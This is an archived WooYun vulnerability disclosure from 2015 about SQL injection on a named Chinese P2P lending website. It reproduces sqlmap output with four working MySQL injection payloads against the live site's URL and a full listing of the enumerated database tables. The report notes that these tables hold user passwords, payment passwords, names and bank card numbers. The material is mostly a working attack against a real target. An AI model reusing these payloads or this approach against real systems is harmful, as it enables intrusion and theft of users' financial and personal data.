乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-01: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-15: 厂商已经主动忽略漏洞,细节向公众公开
https://www.letoudai.com/invest/index/1*/export/1/serial_number/1/money/1
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: https://www.letoudai.com:443/invest/index/1') RLIKE (SELECT (CASE WHEN (6441=6441) THEN 1 ELSE 0x28 END)) AND ('WaVc'='WaVc/export/1/serial_number/1/money/1 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: https://www.letoudai.com:443/invest/index/1') AND EXTRACTVALUE(3581,CONCAT(0x5c,0x716b627171,(SELECT (ELT(3581=3581,1))),0x7178786271)) AND ('yTKa'='yTKa/export/1/serial_number/1/money/1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: https://www.letoudai.com:443/invest/index/1');SELECT SLEEP(5) AND ('SkQF'='SkQF/export/1/serial_number/1/money/1 Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: https://www.letoudai.com:443/invest/index/1') AND 2619=BENCHMARK(5000000,MD5(0x4342426e)) AND ('rDDj'='rDDj/export/1/serial_number/1/money/1---web application technology: Nginxback-end DBMS: MySQL 5.1Database: ltd+------------------------+---------+| Table | Entries |+------------------------+---------+| ltd_journal_account | 55005 || ltd_ips_return | 40041 || ltd_user_log | 38882 || ltd_jifen_log | 37981 || ltd_account_log | 35828 || ltd_phone_log | 30186 || ltd_borrow_repay | 20600 || ltd_email_log | 16450 || ltd_user_message | 16441 || ltd_ips_before | 16257 || ltd_account | 14961 || ltd_user | 14959 | //上万用户| ltd_user_info | 14959 || ltd_user_status | 14959 || ltd_user_vip | 12993 || ltd_weixin_news | 12944 || ltd_user_spread | 8264 || ltd_error_log | 8108 || ltd_borrow_tender | 7737 || ltd_account_recharge | 6397 || ltd_activity_log | 5776 || ltd_attachment | 4291 || ltd_account_cash | 4018 || ltd_borrow_verify | 526 || ltd_user_setting | 360 || ltd_borrow_quota | 244 || ltd_document | 220 || ltd_borrow | 206 || ltd_authmenu | 177 || ltd_menu | 169 || ltd_auth | 158 || ltd_borrow_reward | 132 || ltd_rating_info | 101 || ltd_attribute | 85 || ltd_borrow_che | 63 || ltd_borrow_vouch | 61 || ltd_borrow_register | 55 || ltd_config | 49 || ltd_borrow_pawn | 40 || ltd_weixindy_reply | 28 || ltd_user_auto | 25 || ltd_borrow_novice | 20 || ltd_user_address | 20 || ltd_manage_member | 18 || ltd_jifen_exchange | 15 || ltd_linkages | 15 || ltd_jifen_product | 14 || ltd_template | 14 || ltd_borrow_roam | 12 || ltd_document_category | 12 || ltd_weixin_menu | 12 || ltd_model | 10 || ltd_weixindy_menu | 10 || ltd_manage_group | 9 || ltd_remind | 9 || ltd_borrow_category | 8 || ltd_stock | 8 || ltd_navigation | 7 || ltd_addons | 6 || ltd_borrow_repayment | 6 || ltd_borrow_credit | 5 || ltd_borrow_institution | 5 || ltd_topic_config | 5 || ltd_weixin_media | 4 || ltd_api_account | 3 || ltd_autorepay_rule | 3 || ltd_hooks | 3 || ltd_user_autorepay | 3 || ltd_user_group | 3 || ltd_topic | 2 || ltd_jifen_category | 1 || ltd_topic_reply | 1 || ltd_topic_signin | 1 || ltd_weixin_repay | 1 |+------------------------+---------+
ltd_user表中包含账号密码和支付密码
ltd_user_info表中包含姓名和银行卡号等信息:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
